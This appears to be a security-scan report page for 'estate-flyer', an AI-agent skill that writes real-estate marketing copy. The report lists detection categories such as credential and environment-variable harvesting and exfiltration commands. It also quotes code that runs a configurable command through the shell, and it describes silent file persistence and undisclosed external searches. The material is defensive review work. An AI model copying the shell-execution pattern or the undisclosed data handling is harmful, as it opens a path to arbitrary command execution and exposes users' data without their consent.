ClawHub

estate-flyer

Security checks across malware telemetry and agentic risk

Overview

This skill does what it advertises, but it includes an overbroad configurable shell-command path and automatic local persistence that users should review before installing.

Install only if you are comfortable with a skill that can run Bash, contact Weibo and other real-estate/content sources, and save profiles and generated outputs locally. Review or remove the external_command option before use, keep runtime.json writable only by trusted users, and avoid using confidential project details unless you accept the external-search and local-archive behavior.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • Behavioral ASTexec() Call, eval() Call, Dynamic Import
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
Findings (12)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
skill_dir = Path(__file__).resolve().parents[1]
    cmd, timeout = build_command(skill_dir, args.limit)
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=timeout)
    if proc.returncode != 0:
        print(json.dumps({'ok': False, 'command': cmd, 'stderr': proc.stderr.strip(), 'stdout': proc.stdout.strip()}, ensure_ascii=False, indent=2))
        sys.exit(proc.returncode)
Confidence
96% confidence
Finding
proc = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=timeout)

Context-Inappropriate Capability

Medium
Confidence
94% confidence
Finding
The code explicitly supports an externally configurable command path through runtime configuration, even though the stated function is just fetching Weibo hot-search data. That design grants generic code-execution capability to configuration content, expanding the skill from a data-fetching helper into a command runner.

Context-Inappropriate Capability

High
Confidence
98% confidence
Finding
At execution time, the configured command is passed directly to the system shell, which enables shell metacharacters, pipelines, redirection, and command chaining. In the context of a simple trend-fetching skill, this is far more capability than necessary and can be abused for full arbitrary code execution, data exfiltration, or persistence.

Vague Triggers

Medium
Confidence
91% confidence
Finding
The summary/description defines broad natural-language triggers for marketing assistance that can easily overlap with ordinary user requests. This raises the chance of unintended skill activation, causing the agent to perform network access, file reads/writes, and image-generation side effects when the user did not explicitly consent to this workflow.

Vague Triggers

Medium
Confidence
95% confidence
Finding
The listed entry triggers include common phrases such as writing marketing copy or a social post for a property, which are insufficiently constrained and likely to match benign requests. In this skill, accidental invocation is more dangerous because activation immediately commits the agent to external scanning, local file persistence, and possible direct image generation.

Missing User Warnings

Medium
Confidence
94% confidence
Finding
The skill mandates archiving results locally as part of every run but does not disclose persistence to the user. Silent storage of generated content and project data can violate user expectations, create privacy issues, and leave sensitive business or research material on disk without informed consent.

Missing User Warnings

Medium
Confidence
96% confidence
Finding
The workflow requires internet searches and hot-search scanning, including use of multiple external sources, without any user-facing warning that data may be transmitted externally. Even if the queried subject is a property name, the user’s intent, research target, or associated context may be exposed to third parties unexpectedly.

Missing User Warnings

Medium
Confidence
97% confidence
Finding
The skill prioritizes automatically sending prompts to a 'current local model' for image generation and explicitly says this must be done rather than merely returning a prompt. Automatic forwarding to another model endpoint without confirmation can leak sensitive project details, create unintended charges or compute use, and trigger side effects the user did not request at that moment.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
When no estate profile exists, the skill requires collecting information from at least five external sources and then writing the compiled profile locally, but it provides no notice about that storage. This can accumulate third-party content, business intelligence, and potentially inaccurate or sensitive notes on disk without the user's awareness or consent.

Missing User Warnings

Low
Confidence
90% confidence
Finding
The template explicitly encourages sending prompts to an external image-generation service and notes the skill may directly generate images in the current environment, but it provides no warning that content may be processed by third-party systems or that prompts could contain sensitive business or personal data. This can lead users to disclose confidential information without informed consent, creating avoidable privacy and data-handling risk.

Missing User Warnings

Medium
Confidence
93% confidence
Finding
The workflow explicitly instructs the agent to write `profile.md` and `profile.json` to local storage, but it provides no requirement to notify the user or obtain consent before modifying files. In an agent setting, silent persistence can create privacy, integrity, and trust issues, especially if users do not expect local state changes or if later runs consume stale or poisoned cached data.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The workflow mandates internet searches across named third-party platforms and requires at least five external sources, but it does not instruct the agent to disclose that network access will occur. This can expose user queries or sensitive targets to external services, create privacy/compliance concerns, and violate user expectations in environments where outbound requests must be explicitly approved.

VirusTotal

66/66 vendors flagged this skill as clean.

View on VirusTotal